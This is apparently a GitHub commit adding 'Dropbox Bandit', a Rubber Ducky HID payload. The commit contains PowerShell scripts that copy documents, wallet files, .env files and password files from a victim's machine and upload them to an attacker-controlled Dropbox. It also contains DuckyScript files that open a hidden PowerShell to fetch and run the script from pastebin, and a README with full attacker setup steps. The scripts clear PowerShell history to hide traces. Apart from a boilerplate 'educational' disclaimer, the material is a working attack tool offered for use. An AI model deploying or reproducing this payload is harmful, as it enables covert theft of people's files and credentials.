hak5glytch
GitHub
commit
27bd65fad0
|
|
@ -0,0 +1,77 @@
|
|||
# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
|
||||
$source = $env:USERPROFILE+"\Documents\*";
|
||||
|
||||
##############################################################################################
|
||||
# Dropbox API values: Follow read.me tutorial to get these! #
|
||||
##############################################################################################
|
||||
# refresh_token
|
||||
$refreshToken = "REFRESH_TOKEN_HERE";
|
||||
# App key
|
||||
$user = 'APP_KEY_HERE';
|
||||
# App secret
|
||||
$pass = 'APP_SECRET_HERE';
|
||||
|
||||
# temp directory to copy our files to
|
||||
$dest = $env:TMP+"\cpy";
|
||||
$n = 0;
|
||||
$mb = 0;
|
||||
|
||||
# Delete the destination directory if it exists
|
||||
if(Test-Path $dest) { rm -Path $dest -Force -Recurse; }
|
||||
|
||||
# find our files and copy them into the temp directory
|
||||
GCI $source -R -I "*.txt","*wallet*","*.env",".x*",".doc*","*pass*","*auth*" | % {
|
||||
$size = ((GCI $_.FullName).length/1MB);
|
||||
# ignore files that are too big
|
||||
if($size -lt 100) {
|
||||
$mb += $size;
|
||||
# once we come close to exceeding the dropbox upload limit we switch to a new folder
|
||||
if($mb -ge 100) {
|
||||
$mb = 0;
|
||||
$n++;
|
||||
}
|
||||
ROBOCOPY $_.Directory ("$dest\$n\") $_.Name /MT 128 /NJH /NJS | Out-Null;
|
||||
}
|
||||
}
|
||||
|
||||
$creds = @{
|
||||
grant_type = "refresh_token";
|
||||
refresh_token = $refreshToken;
|
||||
};
|
||||
$headers = @{
|
||||
"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${user}:${pass}"));
|
||||
"Content-Type" = "application/x-www-form-urlencoded";
|
||||
};
|
||||
$accessToken = (Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body $creds -Headers $headers).access_token;
|
||||
|
||||
Add-Type -AssemblyName System.IO.Compression.Filesystem;
|
||||
$d=get-date -f MM-dd-yyyy;
|
||||
$t=get-date -f HH-MM-ss;
|
||||
|
||||
# convert our files to zip files and then upload to dropbox
|
||||
for($i = 0; $i -le $n; $i++)
|
||||
{
|
||||
$zip = "$env:TMP\$env:USERNAME-$i-$t.zip";
|
||||
[System.IO.Compression.ZipFile]::CreateFromDirectory("$dest\$i\", $zip, 0, $false);
|
||||
$target="/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip";
|
||||
$arg = '{ "path": "' + $target + '", "mode": "add", "autorename": true, "mute": false }';
|
||||
$headers = @{
|
||||
"Authorization" = "Bearer $accessToken";
|
||||
"Content-Type" = "application/octet-stream";
|
||||
"Dropbox-API-Arg" = $arg;
|
||||
};
|
||||
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $zip -Headers $headers | Out-Null;
|
||||
}
|
||||
|
||||
# delete the temp directory
|
||||
rm $dest -Force -Recurse;
|
||||
# delete the zip files
|
||||
for($i = 0; $i -le $n; $i++)
|
||||
{
|
||||
rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Force;
|
||||
}
|
||||
|
||||
# hide our traces (only will delay blue team -- not totally prevent them from seeing the traces)
|
||||
Clear-History;
|
||||
rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*";
|
||||
exit;
|
||||
|
|
@ -0,0 +1,19 @@
|
|||
# directory to steal from (ALL SUBDIRECTORIES INSIDE AS WELL)
|
||||
$s=$env:USERPROFILE+"\Documents\*";
|
||||
# filetypes to exfiltrate
|
||||
$fileTypes="*.txt","*wallet*","*.env","*.x*","*.doc*","*pass*","*auth*";
|
||||
##############################################################################################
|
||||
# Dropbox API values: Follow read.me tutorial to get these! #
|
||||
##############################################################################################
|
||||
# refresh_token
|
||||
$r="REFRESH_TOKEN_HERE";
|
||||
# App key
|
||||
$u = 'APP_KEY_HERE';
|
||||
# App secret
|
||||
$p = 'APP_SECRET_HERE';
|
||||
# do not touch below this line unless you know what you're doing
|
||||
$ds=$env:TMP+"\cpy";$n = 0;$mb = 0;if(Test-Path $ds){rm $ds -Fo -R;}GCI $s -R -I $fileTypes|%{$sz = ((GCI $_.FullName).length/1MB);if($size -lt 100){$mb+=$sz;if($mb -ge 100){$mb = 0;$n++;}ROBOCOPY $_.Directory ("$ds\$n\") $_.Name /MT 128 |Out-Null;}}
|
||||
$a=(Invoke-RestMethod https://api.dropbox.com/oauth2/token -Method Post -Body @{grant_type = "refresh_token";refresh_token = $r;} -Headers @{"Authorization" = "Basic "+ [System.Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes("${u}:${p}"));"Content-Type" = "application/x-www-form-urlencoded";}).access_token;
|
||||
Add-Type -AssemblyName System.IO.Compression.Filesystem;$d=get-date -f MM-dd-yyyy;$t=get-date -f HH-MM-ss;for($i = 0;$i -le $n;$i++){$z="$env:TMP\$env:USERNAME-$i-$t.zip";[System.IO.Compression.ZipFile]::CreateFromDirectory("$ds\$i\",$z,0,$false);
|
||||
Invoke-RestMethod https://content.dropboxapi.com/2/files/upload -Method Post -InFile $z -Headers @{"Authorization"="Bearer $a";"Content-Type"="application/octet-stream";"Dropbox-API-Arg"="{`"path`":`"/$(hostname)-$env:USERNAME/$d/$env:USERNAME-$i-$t.zip`",`"mode`":`"add`",`"autorename`":true,`"mute`":false}";}|Out-Null;}
|
||||
rm $ds -Fo -R;for($i = 0;$i -le $n;$i++){rm "$env:TMP\$env:USERNAME-$i-$t.zip" -Fo;}Clear-History;rm "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\*" -Fo;exit;
|
||||
|
|
@ -0,0 +1,28 @@
|
|||
REM Title: Dropbox Bandit
|
||||
REM Author: Factor (github.com/Factor101)
|
||||
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
|
||||
REM Target: Windows 10/11 (Powershell)
|
||||
REM Version: 1.0
|
||||
REM Category: Exfiltration
|
||||
REM Legal: This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.
|
||||
|
||||
ATTACKMODE HID
|
||||
REM Inital Delay
|
||||
DELAY 500
|
||||
|
||||
REM Open CMD
|
||||
GUI r
|
||||
REM Delay to allow window to open
|
||||
DELAY 100
|
||||
REM Launch hidden powershell window to execute our script
|
||||
|
||||
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
|
||||
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
|
||||
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
|
||||
REM --------- replace me! ----------
|
||||
STRINGLN powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
|
||||
DELAY 200
|
||||
|
||||
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
|
||||
CAPSLOCK
|
||||
ATTACKMODE OFF
|
||||
|
|
@ -0,0 +1,26 @@
|
|||
REM Title: Dropbox Bandit
|
||||
REM Author: Factor (github.com/Factor101)
|
||||
REM Description: Extracts files from a specific location on a target's machine and uploads them to dropbox account
|
||||
REM Target: Windows 10/11 (Powershell)
|
||||
REM Version: 1.0
|
||||
REM Category: Exfiltration
|
||||
|
||||
REM Inital Delay
|
||||
DELAY 500
|
||||
|
||||
REM Open CMD
|
||||
GUI r
|
||||
REM Delay to allow window to open
|
||||
DELAY 100
|
||||
REM Launch hidden powershell window to execute our script
|
||||
|
||||
REM Upload your ex.ps1 payload to pastebin or dropbox (or another website, if you want) and copy the URL here
|
||||
REM if you're using dropbox ensure the link ends with ?dl=1 and not ?dl=0
|
||||
REM if you're using pastebin ensure you're using the "raw" link e.g. http://pastebin.com/raw/<paste_id>
|
||||
REM --------- replace me! ----------
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass "$e=$env:TMP+'\ex.ps1';iwr https://pastebin.com/raw/<paste_id> -O $e;iex $e;rm $e"
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
REM Presses CAPSLOCK to indicate that payload is finished and you can remove the Ducky
|
||||
CAPSLOCK
|
||||
|
|
@ -0,0 +1,47 @@
|
|||
# **Dropbox Bandit**
|
||||
This payload is designed to target Windows 10/11 machines, but but may run on older versions of Windows. If you are using an older Rubber Ducky please use the "payload_duckyscript_old.txt" file.
|
||||
|
||||
This payload extracts files from a specific location on a target's machine and uploads them in archives to a dropbox account. The actual payload takes about 5 seconds to run (faster on real machines, tested on virtual machine), but the actual exfiltration, which is invisible to the victim one started, can take longer depending on the total size of data to be uploaded.
|
||||
|
||||
**Configuration:**
|
||||
- Selects a folder (and thereby all subfolders) to extract files from
|
||||
- Select filetype(s) or filename(s) to target
|
||||
- Dropbox account to use
|
||||
|
||||
**Payload Anatomy:**
|
||||
- The payload runs a hidden and windowless powershell window which then downloads and executes the powershell script from a url.
|
||||
- The powershell script finds all the files that match the chosen parameters and copies them to a directory in %temp%\cpy\0
|
||||
- Once the amount of files in the temporary directory exceeds 100mb, close to the dropbox upload size limit, the script creates a new subdirectory
|
||||
- The script obtains a token from the dropbox api to be used for uploading later, using the refresh_token (see info on how to get this token below)
|
||||
- The script archives each of our subdirectories into zip files in %temp%, named like this: `${USERNAME}-${MM-dd-yyyy}-${HH-MM-ss}.zip`
|
||||
- The script uploads each zip file to this folder on your dropbox account: `${hostname}-{USERNAME}/${MM-dd-yyyy}/`
|
||||
- The script deletes the zip files and temporary directory
|
||||
- The script deletes local powershell history and logs
|
||||
- Script exits
|
||||
|
||||
## **Setup**
|
||||
- Create a new Dropbox account
|
||||
- [Create a new "App"](https://www.dropbox.com/developers/apps/create)
|
||||
-- Select "Scoped Access"
|
||||
-- Select "Full Dropbox"
|
||||
-- Name it whatever you want
|
||||
-- Go the the "Permissions" tab and enable "files.content.write", and "files.metadata.write"
|
||||
-- Go to the "Settings" tab and copy your "App key" and "App secret"
|
||||
-- Go to the "Settings" tab -> OAuth 2 -> Generated Access token and copy the token that you generate. **Important: This token will expire in 4 hours**, so you will only use this one to get your refresh token
|
||||
-- Enter this link in your browser: https://www.dropbox.com/oauth2/authorize?client_id=YOUR_APP_KEY_GOES_HERE&token_access_type=offline&response_type=code, but ensure you replace "YOUR_APP_KEY_GOES_HERE" with your app key from above
|
||||
-- Click "Continue" and "Allow" and then copy the token it gives you. This is your "refresh_token"
|
||||
- Now that we have all our dropbox information, download the powershell script "ex.ps1"
|
||||
-- Set $s to the folder you want to exfiltrate data from
|
||||
-- Set $fileTypes to the filters for what files you want to grab
|
||||
-- Set $r to your refresh token from above
|
||||
-- Set $u to your App Key
|
||||
-- Set $p to your App Secret
|
||||
-- Save the script
|
||||
- Select all the code your newly modified powershell script, and upload it to any of these:
|
||||
-- Dropbox: Upload the script as a .ps1 file and copy the download link, replacing ?dl=0 at the end with ?dl=1
|
||||
-- Pastebin: Upload the text and copy the "raw" version of the URL, e.g. [pastebin.com/raw/<script id>]()
|
||||
-- [Spectre](https://www.klgrth.io/) (Pastebin alternative), Upload the text and copy the url; make sure your add /raw to the end of your url
|
||||
- Enter the url into payload.txt
|
||||
- Compile your payload using payloadstudio
|
||||
|
||||
This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.
|
||||
Loading…
Reference in New Issue